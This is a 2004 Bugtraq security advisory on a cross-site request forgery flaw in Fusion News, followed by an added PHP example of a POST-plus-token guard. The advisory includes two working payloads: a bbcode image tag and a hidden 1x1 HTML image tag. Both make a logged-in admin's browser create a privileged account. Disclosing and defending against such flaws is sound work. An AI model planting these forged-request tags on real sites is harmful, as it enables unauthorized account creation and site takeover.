List: bugtraq
Subject: Fusion News Yet Another Unauthorized Account Addition Vulnerability
From: Joseph Moniz <r3d_5pik3 () yahoo ! com>
Date: 2004-07-29 22:52:24
Message-ID: 20040729225224.24449.qmail () www ! securityfocus ! com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product: Fusion News
Vendor: FusionPHP (fusionphp.net)
Affected Versions: 3.6.1 and lower
Description: A widely used news management system
Vulnerabilities: Unauthorized Account Addition Vulnerability
Date: July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)
OK, this is basically all due to the vendor being really lazy and not SUFFICIENTLY patching the previous similar exploit. Basically, all the vendor did to stop the last vulnerability was make it so you had to be signed on as an admin to create an account, and that is simply just not enough.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)
Unlike the previous related vulnerability, with this one you can't simply type something into the URL bar and press enter. All you have to do is make sure the admin is logged on, then do one of the following (the first is probably the most reliable for an attacker).
1.) Leave them a comment with an [img] bbcode set like this:
[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]
2.) As long as the admin has RECENTLY logged on, you could exploit it remotely by convincing him to go to a site that has a malicious <img> tag such as the following:
<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1" size="1" width="1">
That would make a 1x1 pixel image, meaning the admin wouldn't even know what happened.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)
Give me 5 seconds to press the send button to the vendor ;)
-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)
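
The advisory's point is that an admin-session check alone does not stop requests that the admin's own browser is tricked into sending. As an added example (not part of the original post and not Fusion News code; all function and field names are hypothetical), a signup guard that also requires POST and a per-session token, run against three constructed requests:

```php
<?php
// Added example, not Fusion News code: function and field names are hypothetical.

// Issue one random token per session; the admin's signup form embeds it.
function csrf_token(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Decide whether an account-creation request may proceed.
// Returns 'ok' or the reason the request was refused.
function check_signup_request(string $method, array $post, array $session): string {
    // The check the advisory says the vendor added: caller must be a signed-in admin.
    if (empty($session['is_admin'])) {
        return 'not admin';
    }
    // An [img] or <img> tag can only trigger a GET, so state changes must not accept GET.
    if ($method !== 'POST') {
        return 'method not allowed';
    }
    // A cross-site form POST still carries the session cookie but cannot know the token.
    $sent = $post['csrf'] ?? '';
    if (!is_string($sent) || empty($session['csrf']) || !hash_equals($session['csrf'], $sent)) {
        return 'bad csrf token';
    }
    return 'ok';
}

// Constructed requests, all arriving with a valid admin session.
$session = ['is_admin' => true];
$token = csrf_token($session);
$fields = ['username' => 'newuser', 'password' => 'example', 'le' => '3'];

// 1. Image-tag request as in the advisory: a GET, so no POST body is read.
echo check_signup_request('GET', [], $session), "\n";
// 2. Cross-site auto-submitted form: POST, but without the token.
echo check_signup_request('POST', $fields, $session), "\n";
// 3. Genuine admin form submission carrying the session token.
echo check_signup_request('POST', $fields + ['csrf' => $token], $session), "\n";
```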